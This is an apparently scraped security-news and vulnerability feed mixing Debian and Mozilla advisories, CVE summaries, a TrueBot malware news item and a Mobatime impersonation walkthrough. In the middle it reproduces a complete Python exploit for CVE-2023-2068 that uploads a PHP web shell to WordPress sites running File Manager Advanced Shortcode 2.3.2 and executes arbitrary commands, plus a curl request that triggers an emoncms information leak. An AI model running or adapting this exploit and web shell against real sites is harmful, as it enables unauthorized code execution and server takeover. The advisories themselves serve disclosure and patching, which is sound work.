Type confusion in V8 in Google Chrome prior to 114.0.5735.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-3079

Debian Linux Security Advisory 5418-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5418-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
June 03, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : chromium  
CVE ID         : CVE-2023-2929 CVE-2023-2930 CVE-2023-2931 CVE-2023-2932  
                 CVE-2023-2933 CVE-2023-2934 CVE-2023-2935 CVE-2023-2936  
                 CVE-2023-2937 CVE-2023-2938 CVE-2023-2939 CVE-2023-2940  
                 CVE-2023-2941

Multiple security issues were discovered in Chromium, which could result  
in the execution of arbitrary code, denial of service or information  
disclosure.

For the stable distribution (bullseye), these problems have been fixed in  
version 114.0.5735.90-2~deb11u1.

For the upcoming stable distribution (bookworm), these problems have  
been fixed in version 114.0.5735.90-2~deb12u1.

We recommend that you upgrade your chromium packages.

For the detailed security status of chromium please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/chromium

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmR7SQoACgkQEMKTtsN8  
TjZJjxAAj/KHxjAYEEM1vGexQutPWTI4WJkxPh2Fszxv0HTa3tUuf2DqVpMvBNVr  
sHgSrkSIyTAvsLZsKvM6pc+RKNqP5x6XpFBN1g/Nv4hkJYHV8flFwyA6AGPkAozm  
uD3fCsIuh8ShqCTMwFF4LCA4dUIYvALA0UNQXJexB8plaiDJKaAN5GQxRCq9eYRM  
bc4OqdHeISfG30M+fIOWmKE6mLkC55ksfb9WbDUtsMNHvNrJdt3ki2K9yipTmtsk  
o+0MkV8cmE46hF7gC7KhbE/l9h8OLf/FHQyniEJEFNQ5L3S+bCJV0iFviO5PDjx4  
sooied9tWmQeq2X/ldykapQBWxQuQ0P2LDQgOvMiC81LGWAeJ39vEHpXew/DL0zt  
ACufvKSawqLR4Ckc/iNPAfFg9KECg5X0g6IwCWP/s169KibNdzm00sZ1fmw62Ewr  
N8szHvii0H+7PVpPWuNPb6FZUntC3c3tUwB1w3qnOKTwbLFGzsENQK4hKJudr04t  
sCQ+3S1o1Vvtxy6yhenuzuY4IhgQGGFdELhIP3Wsvg8Rmgj32VKmjPxwZz/cYjYK  
KpmTs7P0+NLegzokaIGeTSWxh2buzeNYnOIJpF130xw99I1f/RsizzN3Itb/3HEx  
wAeyv7DuLe3MNvk8+4WRKrn9aqcr8HPWWCBFzbqtkPv6W1ykvis=gkZS  
-----END PGP SIGNATURE-----

Debian Security Advisory 5418-1

File Manager Advanced Shortcode version 2.3.2 suffers from a remote code execution vulnerability.

    # Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)# Date: 05/31/2023# Exploit Author: Mateus Machado Tesser# Vendor Homepage: https://advancedfilemanager.com/# Version: File Manager Advanced Shortcode 2.3.2# Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15# CVE: CVE-2023-2068import requestsimport jsonimport pprintimport sysimport rePROCESS = "\033[1;34;40m[*]\033[0m"SUCCESS = "\033[1;32;40m[+]\033[0m"FAIL = "\033[1;31;40m[-]\033[0m"try:  COMMAND = sys.argv[2]  IP = sys.argv[1]  if len(COMMAND) > 1:    pass  if IP:    pass  else:    print(f'Use: {sys.argv[0]} IP COMMAND')except:  passurl = 'http://'+IP+'/' # Path to File Manager Advanced Shortcode Panelprint(f"{PROCESS} Searching fmakey")try:  r = requests.get(url)  raw_fmakey = r.text  fmakey = re.findall('_fmakey.*$',raw_fmakey,re.MULTILINE)[0].split("'")[1]  if len(fmakey) == 0:    print(f"{FAIL} Cannot found fmakey!")except:  print(f"{FAIL} Cannot found fmakey!")print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')url = "http://"+IP+"/wp-admin/admin-ajax.php"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1", "Accept": "*/*"}data = "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]\"\r\n\r\nexploit.php\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\n"+fmakey+"\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"w\"\r\n\r\nfalse\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"r\"\r\n\r\ntrue\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide\"\r\n\r\nplugins\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"operations\"\r\n\r\nupload,download\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path_type\"\r\n\r\ninside\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide_path\"\r\n\r\nno\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"enable_trash\"\r\n\r\nno\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_allow\"\r\n\r\ntext/x-php\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_max_size\"\r\n\r\n2G\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"exploit2.php\"\r\nContent-Type: text/x-php\r\n\r\n<?php system($_GET['cmd']);?>\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n\r\n------WebKitFormBoundaryI52DGCOt37rixRS1--\r\n"r = requests.post(url, headers=headers, data=data)print(f"{PROCESS} Sending AJAX request to: {url}")if 'errUploadMime' in r.text:  print(f'{FAIL} Exploit failed!')  sys.exit()elif r.headers['Content-Type'].startswith("text/html"):  print(f'{FAIL} Exploit failed! Try to change _fmakey')  sys.exit(0)else:  print(f'{SUCCESS} Exploit executed with success!')exploited = json.loads(r.text)url = ""print(f'{PROCESS} Getting URL with webshell')for i in exploited["added"]:  url = i['url']print(f"{PROCESS} Executing '{COMMAND}'")r = requests.get(url+'?cmd='+COMMAND)print(f'{SUCCESS} The application returned ({len(r.text)} length):\n'+r.text)

File Manager Advanced Shortcode 2.3.2 Remote Code Execution

Reportlab up to v3.6.12 allows attackers to execute arbitrary code via supplying a crafted PDF file.

CVE-2023-33733: Cure53 – Fine penetration tests for fine websites

emoncms v11 and later was discovered to contain an information disclosure vulnerability which allows attackers to obtain the web directory path and other information leaked by the server via a crafted web request.

emoncms 11 and later version suffers from an information leakage vulnerability. An unauthorized attacker can obtain the web directory path and other information leaked by the server by constructing a special http request.

    curl 'http{s}://{IP}:{PORT}/user/login.json' -X POST -i   -H 'Content-Type: application/x-www-form-urlencoded' -H 'Accept: text/plain, */*; q=0.01' -H 'X-Requested-With: XMLHttpRequest' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36' -H 'Host: {IP}:{PORT}' -H 'Connection: Keep-alive'  -d 'password%5B%5D=1&referrer=&rememberme=1&username=1'

CVE-2023-33518: A bug leaked server web directory and other information · Issue #1856 · emoncms/emoncms

A surge in TrueBot activity was observed in May 2023, cybersecurity researchers disclosed.
"TrueBot is a downloader trojan botnet that uses command and control servers to collect information on compromised systems and uses that compromised system as a launching point for further attacks," VMware's Fae Carlisle said.
Active since at least 2017, TrueBot is linked to a group known as Silence that's

A surge in TrueBot activity was observed in May 2023, cybersecurity researchers disclosed.

"TrueBot is a downloader trojan botnet that uses command and control servers to collect information on compromised systems and uses that compromised system as a launching point for further attacks," VMware's Fae Carlisle said.

Active since at least 2017, TrueBot is linked to a group known as Silence that's believed to share overlaps with the notorious Russian cybercrime actor known as Evil Corp.

Recent TrueBot infections have leveraged a critical flaw in Netwrix auditor (CVE-2022-31199, CVSS score: 9.8) as well as Raspberry Robin as delivery vectors.

The attack chain documented by VMware, on the other hand, starts off with a drive-by-download of an executable named "update.exe" from Google Chrome, suggesting that users are lured into downloading the malware under the pretext of a software update.

Once run, update.exe establishes connections with a known TrueBot IP address located in Russia to retrieve a second-stage executable ("3ujwy2rz7v.exe") that's subsequently launched using Windows Command Prompt.

The executable, for its part, connects to a command-and-control (C2) domain and exfiltrates sensitive information from the host. It's also capable of process and system enumeration.

UPCOMING WEBINAR

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

"TrueBot can be a particularly nasty infection for any network," Carlisle said. "When an organization is infected with this malware, it can quickly escalate to become a bigger infection, similar to how ransomware spreads throughout a network."

The findings come as SonicWall detailed a new variant of another downloader malware known as GuLoader (aka CloudEyE) that's used to deliver a wide range of malware such as Agent Tesla, Azorult, and Remcos.

"In the latest variant of GuLoader, it introduces new ways to raise exceptions that hamper complete analysis process and its execution under controlled environment," SonicWall said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Alarming Surge in TrueBot Activity Revealed with New Delivery Vectors

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

CVE-2023-33143

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 26 and June 2. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for May 26 to June 2

When encoding data from an <code>inputStream</code> in <code>xpcom</code> the size of the input being encoded was not correctly calculated potentially leading to an out of bounds memory write. This vulnerability affects Firefox < 110, Thunderbird < 102.8, and Firefox ESR < 102.8.

**Mozilla Foundation Security Advisory 2023-05**

Announced

February 14, 2023

Impact

high

Products

Firefox

Fixed in

*   Firefox 110

**#CVE-2023-25728: Content security policy leak in violation reports using iframes**

Reporter

Johan Carlsson

Impact

high

**Description**

The Content-Security-Policy-Report-Only header could allow an attacker to leak a child iframe's unredacted URI when interaction with that iframe triggers a redirect.

**References**

*   Bug 1790345

**#CVE-2023-25730: Screen hijack via browser fullscreen mode**

Reporter

Irvan Kurniawan

Impact

high

**Description**

A background script invoking requestFullscreen and then blocking the main thread could force the browser into fullscreen mode indefinitely, resulting in potential user confusion or spoofing attacks.

**References**

*   Bug 1794622

**#CVE-2023-25743: Fullscreen notification not shown in Firefox Focus**

Reporter

Hafiizh

Impact

high

**Description**

A lack of in app notification for entering fullscreen mode could have lead to a malicious website spoofing browser chrome.  
_This bug only affects Firefox Focus. Other versions of Firefox are unaffected._

**References**

*   Bug 1800203

**#CVE-2023-0767: Arbitrary memory write via PKCS 12 in NSS**

Reporter

Christian Holler

Impact

high

**Description**

An attacker could construct a PKCS 12 cert bundle in such a way that could allow for arbitrary memory writes via PKCS 12 Safe Bag attributes being mishandled.

**References**

*   Bug 1804640

**#CVE-2023-25735: Potential use-after-free from compartment mismatch in SpiderMonkey**

Reporter

Samuel Groß

Impact

high

**Description**

Cross-compartment wrappers wrapping a scripted proxy could have caused objects from other compartments to be stored in the main compartment resulting in a use-after-free after unwrapping the proxy.

**References**

*   Bug 1810711

**#CVE-2023-25737: Invalid downcast in SVGUtils::SetupStrokeGeometry**

Reporter

Lukas Bernhard

Impact

high

**Description**

An invalid downcast from nsTextNode to SVGElement could have lead to undefined behavior.

**References**

*   Bug 1811464

**#CVE-2023-25738: Printing on Windows could potentially crash Firefox with some device drivers**

Reporter

Mark

Impact

high

**Description**

Members of the DEVMODEW struct set by the printer device driver weren't being validated and could have resulted in invalid values which in turn would cause the browser to attempt out of bounds access to related variables.  
_This bug only affects Firefox on Windows. Other operating systems are unaffected._

**References**

*   Bug 1811852

**#CVE-2023-25739: Use-after-free in mozilla::dom::ScriptLoadContext::~ScriptLoadContext**

Reporter

Holger Fuhrmannek

Impact

high

**Description**

Module load requests that failed were not being checked as to whether or not they were cancelled causing a use-after-free in ScriptLoadContext.

**References**

*   Bug 1811939

**#CVE-2023-25729: Extensions could have opened external schemes without user knowledge**

Reporter

Vitor Torres

Impact

moderate

**Description**

Permission prompts for opening external schemes were only shown for ContentPrincipals resulting in extensions being able to open them without user interaction via ExpandedPrincipals. This could lead to further malicious actions such as downloading files or interacting with software already installed on the system.

**References**

*   Bug 1792138

**#CVE-2023-25732: Out of bounds memory write from EncodeInputStream**

Reporter

Ronald Crane

Impact

moderate

**Description**

When encoding data from an inputStream in xpcom the size of the input being encoded was not correctly calculated potentially leading to an out of bounds memory write.

**References**

*   Bug 1804564

**#CVE-2023-25734: Opening local .url files could cause unexpected network loads**

Reporter

Ameen Basha M K and Shaheen Fazim

Impact

moderate

**Description**

After downloading a Windows .url shortcut from the local filesystem, an attacker could supply a remote path that would lead to unexpected network requests from the operating system. This also had the potential to leak NTLM credentials to the resource.  
_This bug only affects Firefox on Windows. Other operating systems are unaffected._

**References**

*   Bug 1809923
*   Bug 1784451
*   Bug 1810143
*   Bug 1812338

**#CVE-2023-25740: Opening local .scf files could cause unexpected network loads**

Reporter

Axel Chong (@Haxatron)

Impact

moderate

**Description**

After downloading a Windows .scf script from the local filesystem, an attacker could supply a remote path that would lead to unexpected network requests from the operating system. This also had the potential to leak NTLM credentials to the resource.  
_This bug only affects Firefox for Windows. Other operating systems are unaffected._

**References**

*   Bug 1812354

**#CVE-2023-25731: Prototype pollution when rendering URLPreview**

Reporter

pyakovlev & Alexander Volkov

Impact

low

**Description**

Due to URL previews in the network panel of developer tools improperly storing URLs, query parameters could potentially be used to overwrite global objects in privileged code.

**References**

*   Bug 1801542

**#CVE-2023-25733: Possible null pointer dereference in TaskbarPreviewCallback**

Reporter

Ronald Crane

Impact

low

**Description**

The return value from gfx::SourceSurfaceSkia::Map() wasn't being verified which could have potentially lead to a null pointer dereference.

**References**

*   Bug 1808632

**#CVE-2023-25736: Invalid downcast in GetTableSelectionMode**

Reporter

Lukas Bernhard

Impact

low

**Description**

An invalid downcast from nsHTMLDocument to nsIContent could have lead to undefined behavior.

**References**

*   Bug 1811331

**#CVE-2023-25741: Same-origin policy leak via image drag and drop**

Reporter

Dohyun Lee (@l33d0hyun) of SSD Labs

Impact

low

**Description**

When dragging and dropping an image cross-origin, the image's size could potentially be leaked. This behavior was shipped in 109 and caused web compatibility problems as well as this security concern, so the behavior was disabled until further review.

**References**

*   Bug 1813376
*   Bug 1437126
*   Bug 1812611

**#CVE-2023-25742: Web Crypto ImportKey crashes tab**

Reporter

Goras Francesco

Impact

low

**Description**

When importing a SPKI RSA public key as ECDSA P-256, the key would be handled incorrectly causing the tab to crash.

**References**

*   Bug 1813424

**#CVE-2023-25744: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers Kershaw Chang and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 109 and Firefox ESR 102.7. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8

**#CVE-2023-25745: Memory safety bugs fixed in Firefox 110**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers Timothy Nikkel, Gabriele Svelto, Jeff Muizelaar and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 109. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 110

CVE-2023-25732: Security Vulnerabilities fixed in Firefox 110

Incorrect Authorization vulnerability in Mobatime web application allows Privilege Escalation, Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Mobatime web application: through 06.7.22.



This walkthrough presents another vulnerability discovered on the Mobatime web application (see CVE-2023-3032, same version 06.7.2022 affected). This vulnerability allows an authenticated user to impersonate another one, possibly having more privileges.

This application is essentially a single page, and the pieces of information are retrieved through AJAX calls. To get adequate pieces of information, the requests carry the user identifier, in order to fetch data related to them. The issue is that this identifier is controlled by the user, and the request body is not protected. It is therefore possible to change this identifier, and impersonate someone else.

A typical AJAX call is as follows:

    POST /Webengine/api/ajax_api.aspx HTTP/1.1 Accept: */*
    Accept-Encoding: gzip, deflate, br
    ... snipped ...
    Sec-GPC: 1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
    AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0
    Safari/537.36 X-Requested-With: XMLHttpRequest
    
    @64eyJhcnJheV9pbnQiOltdLCJmdW5jdGlvbiI6NTA3LCJpcGFyYW0xIjoxNTQsImlwYX
    JhbTEwIjowLCJpcGFyYW0xMSI6MCwiaXBhcmFtMTIiOjAsImlwYXJhbTEzIjowLCJpcGF
    yYW0xNCI6MCwiaXBhcmFtMTUiOjAsImlwYXJhbTIiOjg0MTUsImlwYXJhbTMiOjAsImlw
    YXJhbTQiOjAsImlwYXJhbTUiOjAsImlwYXJhbTYiOjAsImlwYXJhbTciOjAsImlwYXJhb
    TgiOjAsImlwYXJhbTkiOjAsImxwYXJhbTEiOjAsInBhcmFtMSI6IiIsInBhcmFtMiI6Ii
    IsInBhcmFtMyI6IiIsInBhcmFtNCI6IiIsInBhcmFtNSI6IiIsInRva2VuIjowfQ==
    

One can recognise here a base64-encoded JSON (prefix eyJ), which gives us, once decoded:

    {
        "array_int":[],
        "function":507,
        "iparam1":154,
        "iparam10":0,
        "iparam11":0,
        "iparam12":0,
        "iparam13":0,
        "iparam14":0,
        "iparam15":0,
        "iparam2":8415,
        "iparam3":0,
        "iparam4":0,
        "iparam5":0,
        "iparam6":0,
        "iparam7":0,
        "iparam8":0,
        "iparam9":0,
        "lparam1":0,
        "param1":"",
        "param2":"","
        param3":"",
        "param4":"",
        "param5":"",
        "token":0
    }
    

Now, let’s assume that our ID is 154, and that we want to impersonate 155. Keen eye may see that the payload is not signed, hence forgeable. Since the application is a singe page, it was likely that this value 154 was carried by a JS variable, and that we could change it in a single place. All subsequent AJAX calls would probably embed the modified ID, and make us act as 155.

**Hunting the identifier**

Analysing the traffic reveals that the AJAX requests originate from a call to the routine Get in the file MobaBridge3.js. One can suppose here that this routine probably deals with the JSON payload so as to authenticated the request:

A breakpoint was therefore put at line 1’316, before the function end. Refreshing the page reveals that the attribute this._param holds the value 154. It comes from the second argument (param). Since the value 154 was already known there, one can step over LaunchThread to get back to the calling routine ($ctor1).

In this routine, a call to Get is indeed performed, and the second argument containing the identifier is referred to as s. The variable s is obtained thanks to a call to JsonConvert.SerializeObject, hence was likely to be built based on the variable function (line 17). The latter is passed as argument (line 13), and to analyse it, one should once again climb up the calling stack.

The caller lies in the class MensualView.cs, where the func variable is initialised (passed as function). It is worth noting that one of the attributes of func is named iparam1, just like the attribute carrying the identifier in the JSON stream. Its value is held by the attribute Workflow.pid. By looking where such variable is set thanks to a regular expression, only two results are returned. One of them lies on the class LoginLinkWorkflow.cs

By putting a breakpoint at line 139 and refreshing the page, the breakpoint is hit. The value of the variable PId could be turn into 155, and letting the execution flow continue normally, and the page would be rendered as if we were 155.

**Conclusion**

Since only the advertised identifier seems to be used to verify the authorisations, a malicious user could trick the application into thinking that they are someone else by changing their ID on the client side. Since the server trusts this ID, they would serve inappropriate content. The server should use server-side variables to store the ID of a user, based on a session identifier. An alternative could make use of signed JWTs to make them inalterable.

*   **2023** 6
*   **2020** 12

**2023**

**CVE-2023-3033**

3 minute read

This walkthrough presents another vulnerability discovered on the Mobatime web application (see CVE-2023-3032, same version 06.7.2022 affected). This vulnera...

**CVE-2023-3032**

less than 1 minute read

Mobatime offers various time-related products, such as check-in solutions. In versions up to 06.7.2022, an arbitrary file upload allowed an authenticated use...

**CVE-2023-3031**

less than 1 minute read

King-Avis is a Prestashop module developed by Webbax. In versions older than 17.3.15, the latter suffers from an authenticated path traversal, leading to loc...

**FuckFastCGI made simpler**

3 minute read

Let’s render unto Caesar the things that are Caesar’s, the exploit FuckFastCGI is not mine and is a brilliant one, bypassing open\_basedir and disable\_functio...

**PHP .user.ini risks**

4 minute read

I have to admit, PHP is not my favourite, but such powerful language sometimes really amazes me. Two days ago, I found a bypass of the directive open\_basedir...

**PHP open\_basedir bypass**

3 minute read

PHP is a really powerful language, and as a wise man once said, with great power comes great responsibilities. There is nothing more frustrating than obtaini...

Back to Top ↑

**2020**

**Self modifying C program - Polymorphic**

17 minute read

A few weeks ago, a good friend of mine asked me if it was possible to create such a program, as it could modify itself. After some thoughts, I answered that ...

Back to Top ↑

Tag

#chrome